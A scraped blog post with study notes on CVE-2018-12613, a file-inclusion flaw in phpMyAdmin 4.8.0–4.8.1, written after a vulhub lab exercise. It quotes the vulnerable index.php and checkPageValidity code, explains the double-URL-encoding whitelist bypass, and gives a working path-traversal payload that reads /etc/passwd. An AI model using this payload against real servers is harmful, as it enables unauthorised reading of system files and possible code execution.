当前位置:网站首页>A code audit notes (CVE - 2018-12613 phpmyadmin file contains loopholes)
A code audit notes (CVE - 2018-12613 phpmyadmin file contains loopholes)
2022-08-02 04:02:00 【Learn Safe Tom Cat】
前言
I looked at the last blog post20天前的事了,Going to work recently,Learning a lot less,Played it two days agovulhub靶场的phpmyadmin文件包含漏洞(CVE-2018-12613)But some don't understand,By taking time out of Baidu and understanding,写一下笔记,Don't forget about it
漏洞描述
攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,
以及对白名单页面进行不正确的测试. 攻击者必须经过身份验证,但在这些情况下除外:
$ cfg [‘AllowArbitraryServer’] =
true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’]
= 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码.
漏洞影响范围
phpMyAdmin 4.8.0和4.8.1
漏洞分析
查看index.php的50行到63行内容
target_blacklist = array (
'import.php', 'export.php'
); #定义了一个黑名单
// If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) #要求target不为空 && is_string($_REQUEST['target']) #要求target为字符串 && ! preg_match('/^index/', $_REQUEST['target']) #要求target不已index开头 && ! in_array($_REQUEST['target'], $target_blacklist) #要求targetNot in the blacklist && Core::checkPageValidity($_REQUEST['target']) #checkPageValidity要为真 ) { include $_REQUEST['target']; #The above five conditions are met to include the file
exit;
}
The first four conditions are easily met,It is the fifth condition that is a little more troublesome
查看Coer.php的443行到476行
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist; #Initialize the whitelist
}
if (! isset($page) || !is_string($page)) {
return false; #Return if the input and output parameters are empty or not stringsfalse
}
if (in_array($page, $whitelist)) {
return true; #Determines that the incoming parameters are in the whitelist,则返回true
}
#如果这里返回false就执行以下代码
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?') #Intercept incoming parameters to start?中间的字符串
);
if (in_array($_page, $whitelist)) {
return true; #If it is judged again that it exists in the whitelist, it will returntrue
}
#If here is also returnedfalse就执行以下代码
$_page = urldecode($page); #The main trigger of this vulnerability is here,这里进行了一次url解码
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?') #Intercept incoming parameters to start?中间的字符串
);
if (in_array($_page, $whitelist)) {
return true; #Determines that the incoming parameters are in the whitelist,则返回true
}
#如果这里返回false就直接返回false
return false;
}
白名单在core.php的31行到79行
public static $goto_whitelist = array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
playload:index.php?target=sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd
解释:target=sql.php%253f 在服务器收到urldecode once,变成?target=sql.php%3f ;再通过urldecode时,在进行一次url解码,变成?target=sql.php?,符合?The previous one was in the whitelist.所以就绕过了checkPageValidity()方法.
总结
Although it is said that a filtering judgment is carried out here,But he hasn't changed the value we passed in first,Therefore, the vulnerability of arbitrary file inclusion occurs.
The above is my understanding of this vulnerability,如有不对之处,也请大家指出
Talk about your problem,Although it was written down,But in the code audit process,There are still many functions that are not understood,Next time to learnphp和javafor future code audits,This is also my first code audit article,If you don't write clearly and incorrectly, please let us know!
边栏推荐
- (4) Function, Bug, Class and Object, Encapsulation, Inheritance, Polymorphism, Copy
- php函数漏洞总结
- Phonebook
- [symfony/finder]最好用的文件操作库
- GreenOptic: 1 vulnhub walkthrough
- Pycharm打包项目为exe文件
- (6) 学生信息管理系统设计
- TCP communications program
- What are the killer super powerful frameworks or libraries or applications for PHP?
- Masashi: 1 vulnhub walkthrough
猜你喜欢
12.什么是JS
Eric target penetration test complete tutorial
hackmyvm: controller walkthrough
SQL classification, DQL (Data Query Language), and corresponding SQL query statement demonstration
(3)Thinkphp6数据库
13.JS输出内容和语法
MySql Advanced -- Constraints
PHP反序列化漏洞
(6) Design of student information management system
Introduction to PHP (self-study notes)
随机推荐
[campo/random-user-agent] Randomly fake your User-Agent
DVWA靶机安装教程
VIKINGS: 1 vulnhub walkthrough
Praying: 1 vulnhub walkthrough
CTF入门笔记之ping
hackmyvm: controller walkthrough
IO streams, byte stream and byte stream buffer
Introduction to PHP (self-study notes)
12.什么是JS
(5) 模块与包、编码格式、文件操作、目录操作
一个网络安全小白鼠的学习之路——nmap的基本使用
IP access control: teach you how to implement an IP firewall with PHP
Masashi: 1 vulnhub walkthrough
About the apache .htaccess file of tp
v-bind usage: class dynamic binding object array style style and function method
New usage of string variable parsing in PHP8.2
Shuriken: 1 vulnhub walkthrough
Baidu positioning js API
(1) print()函数、转义字符、二进制与字符编码 、变量、数据类型、input()函数、运算符
hackmyvm: kitty walkthrough